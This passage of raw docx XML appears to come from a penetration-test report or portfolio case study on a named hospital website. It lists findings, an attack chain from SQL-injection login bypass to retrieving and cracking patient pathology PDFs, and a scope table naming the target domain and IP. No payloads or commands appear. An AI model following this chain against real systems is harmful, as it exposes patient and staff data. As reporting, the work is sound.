                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Direct disclosure of 30 staff records and 10 shareholder records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL injection enabling patient-portal authentication bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEE2E2"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication boundary bypass followed by access to patient reporting functions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Verbose SQL/database error disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B45309"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Database implementation details disclosed to the remote requester.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive patient-report retrieval following authentication bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FFEDD5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97706"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Three confidential pathology-report PDFs were retrieved after the auth bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Predictable/disclosed patient-report storage path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="DCFCE7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sequential report identifiers and a disclosed storage path reduce discovery effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public disclosure of error-log filename/metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B45309"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory indexing reveals an application error log filename and metadata.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server/hosting fingerprint disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="DCFCE7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web and hosting-layer fingerprints are externally observable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Executive interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>F-02 is independently critical because the web server exposes a database backup containing 30 staff records and 10 shareholder records, including national identifiers, contact data, compensation and ownership information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>F-03 is independently critical because a crafted username value changes an invalid authentication response into an HTTP 302 redirect to the authenticated patient portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>F-05 demonstrates downstream patient-data access after the authentication boundary is bypassed. The report intentionally does not label this as a standalone IDOR because cross-patient authorization was not separately tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>F-01, F-04, F-06 and F-07 reduce attacker effort or disclose application internals and therefore amplify the critical paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>F-08 is defense-in-depth only: server and hosting fingerprints were observed, but no specific version-based exploit was established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>The attack chain in one view</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>External reconnaissance → application and restricted directories discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Directory indexing → backup filename, login surface, report storage path and error-log metadata exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Public SQL backup → confidential HR and shareholder data retrieved without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Patient login baseline → normal HTTP 200 authentication failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Single controlled SQL syntax alteration → HTTP 302 redirect to patient portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Portal HTML → three sequential report download identifiers discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Three encrypted PDFs → retrieved as HTTP 200 application/pdf responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PDF security analysis → legacy Standard handler parameters identified; dictionary-based offline recovery succeeded for all three files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Recovered artifacts → decryption and structural validation completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2. Why this project is technically distinctive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The project is designed as a security engineering case study rather than a scanner dump. Its distinctive value comes from joining offensive validation with defensive interpretation: every material finding has a reproduction path, evidence boundary, root-cause hypothesis at the level supported by the evidence, remediation guidance, detection opportunities and a concrete retest condition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Skills demonstrated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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Demonstrated capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS, WHOIS, HTTP metadata, robots/sitemap analysis, service enumeration and attack-surface mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web application testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication analysis, parameter tampering, SQL injection validation, directory exposure and access-control analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manual exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Differential request testing, browser confirmation and controlled retrieval of sensitive objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tool validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Burp Suite evidence capture and conservative sqlmap verification with limitations recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Document security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF encryption inspection, hash extraction, offline password recovery and post-decryption integrity validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Data analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Structured analysis of exposed HR/shareholder records and exact payroll statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS/CWE mapping, evidence matrix, root-cause analysis, remediation and retest design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Concrete log sources and behavioral indicators for SQLi and anomalous portal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>3. Scope, Authorization &amp; Rules of Engagement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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>In-scope target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>https://medirozahospital.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Starting position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>External, unauthenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Testing model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
